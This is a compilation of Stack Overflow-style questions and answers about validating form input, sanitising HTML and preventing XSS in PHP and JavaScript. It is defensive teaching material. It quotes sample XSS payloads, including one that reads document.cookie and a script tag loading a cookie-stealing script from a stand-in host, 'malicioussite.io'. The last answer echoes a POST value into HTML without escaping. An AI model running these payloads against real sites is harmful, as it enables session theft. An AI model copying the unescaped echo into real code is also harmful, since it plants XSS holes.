When I type in a name in a textbox on a form, how can I validate that name before the user clicks submit?
I see this all the time in CMS and in some forums and never been able to figure it out.
Joe
That depends entirely on what you want to validate. Are you trying to filter out potentially dangerous characters? Is there a format you want names to adhere to?
If you want to filter it before the user clicks submit, then you'll need to use Javascript.
Read in the value of the textbox, either as the user types it, or after focus is no longer on the textbox, and then inspect the value to see if you're happy with what has been put in. The easiest way to do that is by using regular expressions. Look them up.
You can disable the submit button until the text field validates.
However, it may still be possible to submit the form, so make sure you do validation on the server side too. Again, it depends entirely on what you want to do - PHP has lots of built-in functions for validating strings to filter out malicious characters, HTML entities, and more.
Figure out what you want to do, then look it up in a search engine.
I am assuming you are talking about seeing if a username is available or if the username is valid - the best way to do this is by using a jQuery plugin.
There are plenty of tutorials available online to walk you though the all steps.
Such as jQuery Username Availability check.
Related
I know similar questions have been asked but I am struggling to work out how to do it.
I am building a CMS, rather primitive right now, but it's as a learning exercise; in a production site, I would use an existing solution for sure.
I would like to take user input, which can be styled in a WYSIWYG editor. I would also like them to be able to insert images inline.
I understand I can store HTML in the database but how can I safely re-render this. I know there is no problem with the HTML being stored but it is my understanding that XSS become an issue if I were to just simply dump the user-generated code onto a layout template.
So the question put simply, is how can I store and safely rerender user content in cms? I am using Laravel and PHP. I also have a little knowledge of javascript if its required.
For a CMS where you want to allow some tags but not others, then you want something like HTML Purifier. This will take HTML and run it against a whitelist and regenerate HTML that is safe to display back to the user.
A good and cheap way to avoid cross-site scripting is to get your php program to entitize everything from your users' input before storing it in the database. That is, you want to take this entry from a user
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
and convert it to this before putting it into your database.
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
When you pass < to a browser, it renders it as <, but it doesn't do anything else with it.
The htmlentities() function can do this for you. And, php's htmlspecialchars_decode() can reverse it if you need to. But you shouldn't reverse the operation unless you absolutely must do so, for example to load the document into an embedded editor for changes.
You can also choose to entitize user-furnished text after you retrieve it from your database and before you display it. If you get to the point where several people work on your code, you may want to do both for safety.
You can also render user-provided input inside <pre>content</pre> tags, which tells the brower to just render the text and do nothing else with it.
(Use right-click Inspect on this very page to see how Stack Overflow handles my malicious example.)
I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saving, but when they say untrusted data do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by never insert untrusted data except in allowed locations.
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output data in locations of your webpage, where it's expected to run instructions.
As shown on your url, do not put user generated data inside <script>tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following values:
""; console.log(document.cookie);//
So, on a website what you're going to display is going to be this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your user's cookies and elevate their privileges. Now imagine that you're using similar code to say, update which user created the latest post, and shows up via AJAX. That's a disaster waiting to happen if you do something like above (and do not sanitize the username in the first place).
Same applies for <style>,<img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. Also applies to comments. Browsers ignore comments, but some interpreters like the JSP parser handles HTML comments as template text. It doesn't ignore its contents.
Rule #1 is pretty similar tu rule #0, if you're developing web applications at some point or another you will have to output user generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is just letting users write their own HTML if they choose to do so, so if you output HTML from your users in "safe" locations like between <p> tags, then that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post`!
but your browser will also see an external javascript that tells it to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities or use a template engine like Twig, that automatically escapes the output for you.
For example I have a Javascript-powered form creation tool. You use links to add html blocks of elements (like input fields) and TinyMCE to edit the text. These are saved via an autosave function that does an AJAX call in the background on specific events.
The save function being called does the database protection, but I'm wondering if a user can manipulate the DOM to add anything he wants(like custom HTML, or an unwanted script).
How safe is this, if at all?
First thing that comes to mind is that I should probably search for, and remove any inline javascript from the received html code.
Using PHP, JQuery, Ajax.
Not safe at all. You can never trust the client. It's easy even for a novice to modify DOM on the client side (just install Firebug for Firefox, for example).
While it's fine to accept HTML from the client, make sure you validate and sanitize it properly with PHP on the server side.
Are you saving the full inline-html in your database?
If so, try to remake everything and only save the nessesary data to your backend. ALL fields should also be controlled if they are recieved in the expected way.
All inline-js is easily removed.
You can never trust the user!
Absolutely unsafe, unless you take the steps to make it safe of course. StackOverflow allows certain tags, filtered so that users can't do malicous things. You'll definately need to do something similar.
I'd opt to sanitize input server side so that everyone gets their input sanitized, whether they've blocked scripts or not. Using something like this: http://www.phpclasses.org/package/3746-PHP-Remove-unsafe-tags-and-attributes-from-HTML-code.html or http://grom.zeminvaders.net/html-sanitizer implemented with AJAX would be a pretty good solution
I have an autosuggest done in PHP which on selection will provide to me the id of the item selected from the auto suggest. I would like to post the id that was selected to the server. What would be the best practice to store this variable and sent the same to the server via HTTP Post in PHP?
Steps:
List data from a Auto Suggest Text Box. (This is done using javascript).
Select an Item from the Auto Suggest and also store the key value for the selection in a data store that can be sent over HTTP Post. (The data store is what I am not able to understand)
Post the form to the server.
I tried to store the value into a hidden field and my javascript breaks, not sure why. Is there any other data store mechanism that I can use other than hidden fields?
Could someone please guide me through this as I am pretty new to PHP.
Thanks and Regards
Abishek R Srikaanth
Your javascript may be breaking due to unescaped ' or some other parsing error. Check your browser's javascript console (firefox and chrome have it) for the error.
Hidden field is the way to go. So instead of using other method, try to fix the JS code.
First of it would help use tremendously if you showed us some code(like other users asked for) to work with. This enables me/us to give you a better answer. You don't have to show all the code but just enough to give us a demonstration(if code should remain private). You can use http://jsfiddle.net/ to host the code easily for us.
Are you using any framework? I would advise you to use JQuery because it is a really nice framework and I believe you could achieve your task with JQuery easily.
I think you should be using HTTP GET instead of POST because POST should not be cached(idempotent) according to HTTP-Specs and I believe your data can and should be cached?
I am having issues creating a sticky for in PHP. It seems all the samples I can find online are using one pages for both the form and the processor. I have two separate pages. This is going to be a very long form and if a validation fails, and the user has to re-enter everything, they won't, they'll quit. So this is a vital feature for this form. Also, I am very new to PHP and haven't touched ASP for several years.
When all is said and done, this form will probably have over 50 items. It is using POST. What is the easiest way to convert my form to a sticky form?
The current form can be found here: http://family.themajdans.com/new_submission.php. Only the "Your Information" part works right now.
Any help would be appreciated.
I suggest using a framework/library which already has support for this feature to generate the form. There are several. In fact, I think there are several dozen.
Why don't you do it like this (one file PHP)... Make sure everything is well sanitized before doing this. Just filter out invalid inputs, and leave valid ones to be reposted.
<input type="text" name="age" value="'.$post["age"].'"/>